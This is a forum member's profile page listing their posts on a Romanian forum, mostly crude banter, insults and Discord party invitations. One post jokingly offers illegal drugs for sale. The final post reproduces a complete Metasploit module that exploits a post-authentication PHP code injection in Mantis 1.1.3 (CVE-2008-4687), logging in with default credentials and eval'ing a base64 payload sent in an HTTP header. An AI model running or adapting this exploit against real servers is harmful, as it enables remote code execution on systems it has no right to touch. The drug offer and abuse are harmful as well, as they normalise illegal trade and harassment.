Jump to content

KRONZY94

Members
  • Posts

    40
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by KRONZY94

  1. =)))))))))))))))))))))))))))))))
  2. Salut. Azi e ziua lu' @kasmir Va asteptam la party pe : https://discord.gg/34Dx9ct De la 20:00 facem show! Organizatori: KronzyBeleaua Dan Farmacie Ben Supremu j1ll2013 Reincarnatu WormValoare Vladutz Saracu Aismen Dintosu Maria Muii gratis la toata lumea! Sarbatorit: @kasmir Invitati Speciali: Florin Salam Dani Mocanu Tzanca Uraganu Leo de la Kuweit ---------------------------------------------------------------------------------------- FREE ENTRY AND MUY LA ALL LUME.
  3. bayetzy mey sunt hall of fame sy yty luam mortyn pl! @WormValoare2018 @coaiemari
  4. Trader😂😂 ești 100% un spammer jegos, PACE!
  5. Propun sa ne dai numarul lu ma-ta si sa ii dam spam tot forumu. Vrei sa iti faci DB cu numere de telefon? Iesi in pula mea de fraier cu site-ul tau si nu mai face atat spam.
  6. l'am raportat poate da si ei ceva
  7. Salut, Iti propun sa schimbi dealer-ul. Poti sa vi la mine, ma faci pe mine cu bani nu pe altu Iti fac reducere, Speish,Has,Maria ce vrea pula ta Iti aduc si coca pe comanda
  8. raportat.
  9. faceti research pe keyword "sinucidere" poate il gasim pe gecko! @Nytro sti ceva si nu vrei sa ne spui ?
  10. am spart efibyay si nasa sy myau spart maskaty kasa
  11. cf cumetre, imi da sclavi astia down vote la afis
  12. DISCORD : https://discord.gg/34Dx9ct ORGANIZATORI : DAN FARMACIE KRONZY INTERGALACTICU AISMEN DINTOSU BEN SIMPATICU IONUTZ SUPREMU J1LL EXPIRATU WORM VALOARE VLAD DIJEIU CURVE PREZENTE : MARIA6 VA ASTEPTAM PE DISCORD IN NUMAR CAT MAI MARE !
  13. Nu uita de pateu !😂😂😂
  14. Nu ne strica sărăcia !
  15. =))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  16. Ma pis pe tine cu tot cu -rep-urile tale Crezi ca ma afecteaza? Off, ma duc sa plang la Nytro ca mi-ai dat -rep la toate posturile
  17. https://nicevps.net/ eu am de aici unu.
  18. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Mantis manage_proj_page PHP Code Execution', 'Description' => %q{ Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote Code Execution vulnerability in the sort parameter of the manage_proj_page.php page. }, 'Author' => [ 'EgiX', # Exploit-DB Entry Author 'Lars Sorenson' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '6768'], ['CVE', '2008-4687'], ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Mantis <= 1.1.3', { } ], ], 'DisclosureDate' => 'Oct 16, 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']), OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']), OptString.new('PASSWORD', [true, 'The password to log in with', 'root']), ]) end def check vprint_status('Checking Mantis version ...') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login_page.php'), 'method' => 'GET' }) unless res vprint_error('Connection to host failed!') return CheckCode::Unknown end unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/ vprint_error('Cannot determine Mantis version!') return CheckCode::Unknown end version = Gem::Version.new(Regexp.last_match[1]) vprint_status("Mantis version #{version} detected") if res.code == 200 && version <= Gem::Version.new('1.1.3') return CheckCode::Appears end CheckCode::Safe end def login vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login_page.php'), }) unless res fail_with(Failure::Unreachable, 'Cannot access host to log in!') end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login.php'), 'method' => 'POST', 'vars_post' => { 'username': datastore['username'], 'password': datastore['password'], }, 'cookie'=> "PHPSESSID=#{res.get_cookies}" }) unless res fail_with(Failure::Unknown, 'Cannot access host to log in!') end fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302 fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php') store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) res.get_cookies end def exploit fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears cookie = login vprint_status('Sending payload ...') payload_b64 = Rex::Text.encode_base64(payload.encoded) data = { 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#", } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'), 'method' => 'POST', 'vars_post' => data, 'headers' => { 'Connection': 'close', 'Cookie': cookie.to_s, 'Cmd': payload_b64 } }) end end
×
×
  • Create New...